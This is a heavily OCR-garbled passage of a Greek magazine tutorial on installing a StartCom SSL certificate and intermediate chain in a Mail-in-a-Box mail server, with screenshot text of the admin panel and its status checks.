е = @ Identity Card ES 
StartCom CA Certificates Name: Christos Varelas 
& Help items ΜΗ — P 
- Address: 
@ StartSSL" Messages * If you want to import one or more CA certificates into your browser i 
Ej] Add Credit Card | PayPal | Ticket] click on the link of the certificate in question. Make sure to edit the Zip, City: ——— 
% About Smart Cards/eToken trust settings of each imported certificate. 5 
boats анана © In order to save the certificates for your server, select the link by right State, Country: Thessslaniki GF 
clicking on it and selecting "Save Link As..." from the menu. Phone: 
@ StartCom CA Certificates = 
$ Decrypt Private Key * StartCom Root CA (PEM encoded) Validations 
Key Bug Checker * StartCom Root CA (DER encoded) сі 1: Сіаѕѕ 2: x 
гч ын Certificate * Server Certificate Bundle with CRLs (PEM encoded) eR ç. € 
3 Class3: Ж εν: x 
[8 Create PKCS#12 (PFX) File * Class 1 Intermediate Server CA < 
li Revocation Request * Class 2 Intermediate Server CA e w š 
@ Check Email Account * Class 3 Intermediate Server CA rg. 
Ф, Check DNS of Domain * Extended Validation Server CA — ity * 
a оТ Communi 
J~ Set Open Identity Preferences * Class 1 Intermediate Client CA 
g Logout * Class 2 Intermediate Client CA 1 Digital Identity Ф 
* Class 3 Intermediate Client CA E 
"——— M e Email Validations + 
* Class 3 Code Signing CA — 
'omain Validations 
Fs D validati Ф 


Па ro ενδιάµεσο πιστοποιητικό επιστρέφουµε oro site της StartCom και συγκεκρι- 
μένα στην καρτέλα Tool Вох. Από τις επιλογές от αριστερά, κάνουμε ένα κλικ στην 
StartCom CA Certificates κι αµέσως εμφανίζεται ένα ομώνυμο παράθυρο. Με κλικ ото 
Class 1 Intermediate Server CA παίρνουμε το ζητούμενο ενδιάμεσο πιστοποιητικό. Av 
θέλετε, αντί να αποθηκεύσετε κάπου ro αντίστοιχο αρχείο ζητήστε v' ανοίξει απευ- 
θείας σε κάποιον plain text editor. 


File Edit Search View Encoding Language Settings Macro Run Plugins Window ? x 
οι ο Πο {| ᾧ D ΓΣ + <| 3 |Ë т [Ех @ | e m I m a| 5 шу 
Н sub class1 server ca pem 


Επιλέγουμε κι 
αντιγράφουµε τα πάντα! 


Normal text file length:2090  lines:35 їл:1 Col:l Sel: 2090|35 UNIX ANSI NS 


Ιδού το ενδιάµεσο πιστοποιητικό που μόλις πήραμε από τη StartCom, όπως φαίνεται 
μέσα από ro Notepad++ για Windows. Επιλέγουµε κι αντιγράφουµε όλο TO περιεχόµε- 
νο, µετά... 
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fSwglFHp9aCNJR3XOMPODjbf8rKnT1ShCOqDKoY8/scqIKnMIMWZ68gQKvcSOOk- 


The CSR is safe to share. It can only be used in combination with a secret key stored on this machine. 


The SSL certificate provider will then provide you with an SSL certificate. They may also provide you with an intermediate chain. Paste each separately into the boxes below. 


SSL certificate: 


eEaDURKfamT35DbKHBm4UvGj7HXQBWUI'sf«HuzT2fVbJbg9qoiqfAZbGDIrjGNqv 
ET4vwau3s5Xb7B4w69TqjOAVO12z9RHplg3oho9Bzdt15MaCcC5NLVYKOjZcsog3i 
m2sXTtyfH9dsBgL GZ0Q/Hr305MpseJZEBYo5fZsBOyXq81kaSoTHOXDHwXdOXx3UI 
d4HOTZjbD9b84e2aoARG 

——END CERTIFICATE—— 


SSL intermediate chain (if provided): 


8apIGZccQ9jnc9kiPtUp5dj45E3V8vKqzp9srSSI5Xapdg+ZcPY+6HNuVB+MagRp 
ZW2One/Qnzg9B4GnVX7MOE TImdoP4KXpostFuxoY/5LxCU1LJAIENV4bxvT50IX2 
GBXCkXIIRLWOgdyll11ift/4IO1aCOGDIJGI498YisM1LGxytmGcxvbJERVri+ 
3GpWAZ5J6dvtf0s+bA== 


After you paste in the information, click the install button. 


шэў 


This is a Mail-in-a-Box 


«πηγαίνουμε oro control panel rou Міав «at ro μεταφέρουμε στο πλαίσιο SSL intermediate 
chain. Πατάμε, βεβαίως, και oro κουμπάκι Install, κάτω αριστερά από το πλαίσιο. 


box.colderayz - Mail-in-a-Box., X 


€ @ https//boxcolderxyz/admin 


SSL Certificate Installation 


Ü 
updated DNS: colder xyz mail services restarted ν΄ 


Αμέσως εμφανίζεται éva παράθυρο поо µας πληροφορείπως οιυπηρεσίες mail του colder. 


χγΖ επανεκκίνησαν. Αυτό σημαίνει πως η εγκατάσταση του πιστοποιητικού ήταν επιτυχής. 


SSL Certificates 


Certificate Status 


Domain Certificate Status Actions 


box.colder.xyz Signed ἃ valid. The certificate expires іп 365 days on 06/02/16. | Replace Certificate. 


colder.xyz Signed 8 valid. Using multi/wildcard certificate of box.colderxyz | Replace Certificate 


Advanced 
Install a multi-domain or wildcard certificate for the box.celder.xyz domain to have it automatically applied to any domains it is valid for. 


Install SSL Certificate 


n net a free nr rhean 381 rertificate We recommend Namerhean's $A rerfificate nr StartS8I ‘e fres 


There are man 


Επειδή το πιστοποιητικό που πήραμε από τη StartCom είναι éykupo тобоо yta ro colder. 
xyz боо και για ro box.colder.xyz, δεν χρειάζεται va επαναλάβουµε τη διαδικασία για 
TO Colder.xyz. Κάτι τέτοιο δεν ισχύει γενικά: Για παράδειγµα, παίζοντας µε τα δωρε- 
άν πιστοποιητικά που δίνει το Gandi για τον πρώτο χρόνο, εἰδαμε ότι καλύπτουν ένα 
µόνο subdomain. 
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€ а Https://box.colderxyz/admin Search w + 9 о 8 «Ὁ = 


Outbound mail (SMTP port 25) is not blocked 


IP address is not blacklisted by zen spamhaus org 


box.colder.xyz 

Nameserver glue records are correct at registrar. [ns1/ns2.box colder Xyz = 46.101.173.140] 

Domain resolves to box's IP address. [box colder xyz ~ 46.101 173.140] 

Reverse DNS is set correctly at ISP. [46.101.173.140 — box colder xyz] 

The DANE TLSA record for incoming mail is correct ( 25. tcp.box colder.xyz). 

Hostmaster contact address exists as a mail alias. [nostmaster@box colder xyz ~ administrator@box colder xyz] 
Domain's email is directed to this domain. [box colder xyz — 10 box colder xyz] 


Postmaster contact address exists as a mail alias. [postmaster@box colderxyz ~ administratorg)box colder xyz] 
Domain is not blacklisted Бу dbl.spamhaus.org. 
SSL certificate is signed & valid. The certificate expires in 365 days on == 


colder.xyz 


4 
ν 
ГА 
y 
v 
ν 
ν 
4 
ν 


DNSSEC 'DS' record is set correctly at registrar. 

Nameservers are set correctly at registrar. [ns1.box colder xyz: ns2 box colder xyz] 

Domain's email is directed to this domain. [colder xyz ~ 10 box colder xyz] 

Postmaster contact address exists as a mail alias. [postmaster@colder xyz ~ administratorg)box colder xyz] 
Domain is not blacklisted by dbl spamhaus org 

Domain resolves to this box's IP address. [colderxyz = 46.101.173.140] 


SSL certificate is signed & valid. Using mult/wildcard certificate of box colderxyz The certificate expires in 365 days оп v^ 
06/02/16 


This is a Mail-in-a-Box. 


O browser είναι πιθανό να θυμάται το παλιό, self-signed πιστοποιητικό που πήρε από 
TO box.colder.xyz. Αποσυνδεθείτε από το λογαριασμό σας oro control panel του Міав, 
επισκεφτείτε ξανά τη διεύθυνση https://box.colder.xyz/admin κιαφού συνδεθείτε kat 
πάλι δώστε ένα System > Status Checks. Θα διαπιστώσετε πως οι έλεγχοι για τα Til- 
στοποιητικά των Colder.xyz και box.colder.xyz είναι επιτυχείς. 


Το έδαφος που έχουµε καλύψει 


Δεν ξέρουμε πόσο κουραστήκατε, αλλά εδὠ που έχουµε φτάσει ήδη διαθέτουμε 
τον δικό µας, πλήρως λειτουργικό mailserver στο cloud! Για πρόσβαση oro webmail 
που παρέχεται µέσω του Roundcube, αρκεί να επισκεπτόµαστε τη διεύθυνση 
https://box.colder.xyz/mail. Αν θέλουμε -novu στην αρχή σίγουρα θα θέλουµε-- να 
δημιουργήσουμε µιανέα διεύθυνση email για εμάς ή κάποιον άλλον χρήστη, apket va 
συνδεθούµε στο web panel του MiaB και να πάμε στο Mail > Users. Στο τέταρτο kat 
τελευταίο µέρος του αφιερώματος θα δούμε μερικά ακόµα χαρακτηριστικά και ÕU- 
νατότητες του MiaB, θα ρυθμίσουμε τον mail client της προτίμησής μας ώστε va µη 
χρειάζεται -σώνει και καλά- va καταφεύγουμε στο webmail του Roundcube (δώστε 
Mail > Instructions), ενώ Ва σας μεταφέρουμε και την εμπειρία µας από το μέτωπο 
του SPAM (µην ανησυχείτε, καλά νέα σας έχουμε). Έως τότε, εξερευνήστε και χαρεί- 
τε τον δικό σας mailserver, ενώ µην ξεχάσετε να ενημερώσετε τους ανθρώπους µε 
τους οποίους επικοινωνείτε πιο συχνά. Ορισμένοι ίσως χρειάζονται µια κάποια ec 
δοποίηση, core va µην παραξενευτούν βλέποντας ξαφνικά emails από διευθύνσεις 
του στυλ yourname(gubernet.org. Καλή σας διασκέδαση! 
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